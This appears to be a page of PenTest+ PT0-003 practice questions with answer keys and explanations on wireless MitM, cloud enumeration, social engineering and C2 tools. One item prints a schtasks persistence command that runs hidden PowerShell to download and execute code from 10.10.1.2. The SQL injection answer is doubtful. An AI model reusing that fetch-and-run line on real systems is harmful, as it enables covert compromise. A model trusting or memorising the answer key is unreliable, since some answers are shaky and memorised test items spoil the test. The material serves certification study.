Practice Free PT0-003 Exam Online Questions
A company hires a penetration tester to test the security of its wireless networks. The main goal is to intercept and access sensitive data.
Which of the following tools should the security professional use to best accomplish this task?
- A . Metasploit
- B . WiFi-Pumpkin
- C . SET
- D . theHarvester
- E . WiGLE.net
B
Explanation:
WiFi-Pumpkin is used for man-in-the-middle (MitM) attacks on Wi-Fi networks, making it ideal for intercepting and accessing data.
Option A (Metasploit) ❌: Good for exploitation, but not specialized for Wi-Fi attacks.
Option B (WiFi-Pumpkin) ✅: Correct. It creates fake Wi-Fi access points and intercepts network traffic (SSL stripping, DNS spoofing).
Option C (SET – Social Engineering Toolkit) ❌: Focuses on phishing, not Wi-Fi attacks.
Option D (theHarvester) ❌: Used for OSINT, not Wi-Fi exploitation.
Option E (WiGLE.net) ❌: Maps Wi-Fi networks, but does not capture sensitive data.
Reference: CompTIA PenTest+ PT0-003 Official Guide – Wireless Attacks & Fake APs
A tester obtained access to a computer using an SMB exploit and now has shell access to the target computer.
The tester runs the following on the obtained shell:
schtasks /create /tn Updates /tr "C:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.10.1.2/asd''))'" /sc onlogon /ru System
Which of the following does this action accomplish?
- A . Upgrades the shell performing a privilege escalation activity
- B . Uses the Windows Update service to move the shell connection and avoid detection
- C . Maintains access into the compromised computer
- D . Forwards all the communication from the compromised host to the host 10.10.1.2
C
Explanation:
The correct answer is C. Maintains access into the compromised computer
The command uses schtasks to create a Windows scheduled task named Updates. The task is configured to run PowerShell and download/execute code from http://10.10.1.2/asd. The schedule option /sc onlogon means the task runs when a user logs on, and /ru System attempts to run it under the SYSTEM account.
This is a persistence technique. By creating a scheduled task that runs at logon, the tester can regain or maintain access after the initial shell is lost, the system reboots, or a user logs back in.
A is incorrect because the command does not directly upgrade the shell or exploit a privilege escalation vulnerability. It creates a scheduled task for recurring execution.
B is incorrect because the task is named Updates, but it is not actually using the Windows Update service.
D is incorrect because the command downloads and executes content from 10.10.1.2; it does not configure traffic forwarding or tunneling.
In PenTest+ terms, this falls under Attacks and Exploits, specifically post-exploitation persistence using Windows scheduled tasks.
A penetration tester compromises a developer’s workstation and believes the individual may have access to Amazon cloud compute resources.
Which of the following commands is least likely to trigger SOC detections to confirm access?
- A . aws sts get-caller-identity
- B . aws connect describe-user
- C . aws ec2 describe-instances --dry-run
- D . aws cloud9 list-environments --max-items 1
C
Explanation:
The correct answer is C. aws ec2 describe-instances --dry-run
The tester wants to confirm whether the compromised user has access to Amazon cloud compute resources. Amazon EC2 is the primary AWS compute service, and describe-instances is used to enumerate EC2 instances.
The --dry-run option is important because it checks whether the caller has permission to perform the action without actually returning instance data. If the user has permission, AWS returns a DryRunOperation message. If the user does not have permission, AWS returns an UnauthorizedOperation message.
This makes it a lower-impact and less noisy way to validate EC2 access compared with fully enumerating cloud resources.
A is incorrect because aws sts get-caller-identity only confirms the AWS identity associated with the credentials. It does not confirm access to EC2 or other compute resources.
B is incorrect because aws connect describe-user relates to Amazon Connect, not Amazon EC2 compute access.
D is incorrect because AWS Cloud9 is a cloud-based development environment. Listing Cloud9 environments does not confirm access to EC2 production compute resources as directly as an EC2 dry-run permission check.
In PenTest+ terms, this falls under Information Gathering and Vulnerability Scanning, specifically cloud enumeration and low-impact validation of cloud permissions.
A penetration tester needs to obtain sensitive data from several executives who regularly work while commuting by train.
Which of the following methods should the tester use for this task?
- A . Shoulder surfing
- B . Credential harvesting
- C . Bluetooth spamming
- D . MFA fatigue
A
Explanation:
Shoulder surfing is the most effective method in this context. When executives work in public places such as trains, an attacker can view their screens without being detected in order to collect confidential data.
Credential harvesting requires phishing or direct exploitation. Bluetooth spamming and MFA fatigue do not apply directly to a physical observation setting.
Reference: PT0-003 Objective 2.1 – Social engineering and physical observation methods.
A penetration tester wants to use PowerView in an AD environment.
Which of the following is the most likely reason?
- A . To collect local hashes
- B . To decrypt stored passwords
- C . To enumerate user groups
- D . To escalate privileges
C
Explanation:
PowerView is a PowerShell tool used for Active Directory enumeration. It is part of the PowerSploit framework and allows penetration testers to gather detailed information about the AD environment, including user accounts, groups, computers, shares, and trust relationships.
PowerView is most commonly used to:
Enumerate domain users, groups, and memberships
Identify privileged users and group memberships
Discover domain trusts and permissions
According to the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 8 – Post-Exploitation and Lateral Movement):
“PowerView is a post-exploitation tool used primarily for Active Directory reconnaissance, including user and group enumeration, identifying domain trusts, and mapping out the AD structure.”
Reference: CompTIA PenTest+ PT0-003 Official Study Guide, Chapter 8
During an assessment of a company, a penetration tester sends the following email to the company’s Chief Financial Officer (CFO):
Dear CFO, As we talked about during a recent meeting, please open the following attachment that contains the invoice for an existing vendor. If you do not pay this now, we will suspend the licenses for your billing system in three days.
GoPay CMS Systems Services
Which of the following techniques is this attack an example of?
- A . Whaling
- B . Phishing
- C . Spear phishing
- D . Vishing
A
Explanation:
The correct answer is A. Whaling
Whaling is a type of phishing attack that specifically targets high-profile or senior executives, such as a CFO, CEO, CIO, or other executive-level personnel. In this scenario, the email is directed at the company’s Chief Financial Officer and uses financial pressure, urgency, and a vendor invoice theme to persuade the recipient to open an attachment or take action.
B is incorrect because phishing is a broad term for fraudulent email-based attacks, but this question specifically targets a senior executive, making whaling the better answer.
C is incorrect because spear phishing is targeted phishing against a specific person or group, but when the target is an executive-level individual such as a CFO, the more precise term is whaling.
D is incorrect because vishing involves voice-based phishing, such as phone calls or voicemail. This scenario uses email, not voice communication.
In PenTest+ terms, this falls under Attacks and Exploits, specifically social engineering, phishing techniques, and targeted executive attacks.
A company hires a penetration tester to perform an external attack surface review as part of a security engagement. The company informs the tester that the main company domain to investigate is comptia.org.
Which of the following should the tester do to accomplish the assessment objective?
- A . Perform information-gathering techniques to review internet-facing assets for the company.
- B . Perform a phishing assessment to try to gain access to more resources and users’ computers.
- C . Perform a physical security review to identify vulnerabilities that could affect the company.
- D . Perform a vulnerability assessment over the main domain address provided by the client.
A
Explanation:
An external attack surface review focuses on identifying publicly accessible assets that an attacker could exploit. The first step in this process is information gathering, which involves enumerating domains, subdomains, public IPs, DNS records, and other internet-facing resources. This is done using passive reconnaissance tools such as Whois, Shodan, Google Dorking, and OSINT techniques.
Option A is correct because it aligns with the assessment goal: finding public-facing systems and their vulnerabilities before an attacker does.
Option B (phishing assessment) is incorrect because it involves social engineering, which is not part of an external attack surface review.
Option C (physical security review) is incorrect as it pertains to physical penetration testing, not an external attack analysis.
Option D (vulnerability assessment) is incorrect because a vulnerability assessment is a later step after reconnaissance. The first step is identifying assets through information gathering.
Reference: CompTIA PenTest+ PT0-003 Official Guide – Chapter 4 (Information Gathering and OSINT).
As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands.
Which of the following techniques would the penetration tester most likely use to access the sensitive data?
- A . Logic bomb
- B . SQL injection
- C . Brute-force attack
- D . Cross-site scripting
B
Explanation:
SQL injection (SQLi) is a technique that allows attackers to manipulate SQL queries to execute arbitrary commands on a database. It is one of the most common and effective methods for accessing sensitive data in internal applications that accept unexpected user inputs.
Here's why option B is the most likely technique:
Arbitrary Command Execution: The question specifies that the internal application accepts unexpected user inputs leading to arbitrary command execution. SQL injection fits this description as it exploits vulnerabilities in the application’s input handling to execute unintended SQL commands on the database.
Data Access: SQL injection can be used to extract sensitive data from the database, modify or delete records, and perform administrative operations on the database server. This makes it a powerful technique for accessing sensitive information.
Common Vulnerability: SQL injection is a well-known and frequently exploited vulnerability in web applications, making it a likely technique that a penetration tester would use to exploit input handling issues in an internal application.
References from penetration-testing write-ups:
Luke HTB: This write-up demonstrates how SQL injection was used to exploit an internal application and access sensitive data. It highlights the process of identifying and leveraging SQL injection vulnerabilities to achieve data extraction.
Writeup HTB: Describes how SQL injection was utilized to gain access to user credentials and further exploit the application. This example aligns with the scenario of using SQL injection to execute arbitrary commands and access sensitive data.
Conclusion:
Given the nature of the vulnerability described (accepting unexpected user inputs leading to arbitrary command execution), SQL injection is the most appropriate and likely technique that the penetration tester would use to access sensitive data. This method directly targets the input handling mechanism to manipulate SQL queries, making it the best choice.
A penetration tester wants to send a specific network packet with custom flags and sequence numbers to a vulnerable target.
Which of the following should the tester use?
- A . tcprelay
- B . Bluecrack
- C . Scapy
- D . tcpdump
C
Explanation:
Scapy is a powerful interactive Python-based packet manipulation tool used by penetration testers to create, modify, send, and analyze custom packets. It supports many protocols and allows you to set TCP flags, sequence numbers, and more.
tcprelay is used to redirect TCP traffic, not to craft packets.
Bluecrack is used for cracking Bluetooth encryption, irrelevant in this context.
tcpdump is a packet capture tool, not suitable for crafting or injecting packets.
Reference: PT0-003 Objective 3.4 – Tools for manipulating traffic, including Scapy for custom packet creation.
A penetration tester sets up a C2 (Command and Control) server to manage and control payloads deployed in the target network.
Which of the following tools is the most suitable for establishing a robust and stealthy connection?
- A . ProxyChains
- B . Covenant
- C . PsExec
- D . sshuttle
B
Explanation:
C2 servers are used to remotely control compromised systems while avoiding detection.
Covenant (Option B):
Covenant is an advanced C2 framework designed for stealthy post-exploitation in red team operations.
Supports encrypted communication, privilege escalation, and evasion techniques.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "C2 Frameworks in Post-Exploitation"
Incorrect options:
Option A (ProxyChains): Used for proxying connections, but not a C2 framework.
Option C (PsExec): A Windows command-line tool for remote execution, but not a C2 tool.
Option D (sshuttle): Used for network tunneling, not full C2.
